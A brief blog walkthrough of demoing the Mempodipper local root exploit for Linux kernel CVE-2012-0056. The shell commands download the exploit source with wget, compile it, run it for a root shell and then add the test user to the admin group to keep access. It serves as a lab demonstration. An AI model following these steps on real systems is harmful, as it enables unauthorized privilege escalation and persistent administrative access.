Linux kernel CVE-2012-0056 Walk through

This is a walk through to using the recent Linux Local Root for >=2.6.39, 32-bit and 64-bit by zx2c4

First you need to check what kernel the box is running.

# uname -r

In my case under backtrack 5 which is based on Ubuntu that users the kernel 2.6.39.4 which in vulnerable.

I then added a normal user that I would use for the demo

 #useradd test

I then logged back in with test account

Then I checked what privileges the account had

#groups test

Which showed test was not a root enabled account

I then moved from to the Desktop

#cd /Desktop

I then made a folder to store the exploit source in.

#mkdir mempodipper

Then I moved to mempodipper directory

# cd /mempodipper

Then I downloaded the exploit source from github

#wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

Then compiled it

#gcc mempodipper.c -w -o mempodipper

Then ran it

#./memopdipper

It then gave all its output from the exploit, it was successful as it gave me a root shell

#whoami

returned root confirming that it worked.

I then added myself to the usergroup root

#sudo adduser test admin

Adding user `test’ to group `admin’ …

Adding user test to group admin

Done.

So from a test account you have got a full root account 😀

Then I verified that the user had really been added to the group root

#groups test

Source used to make this post and an in depth technical explanation of the exploit : http://blog.zx2c4.com/749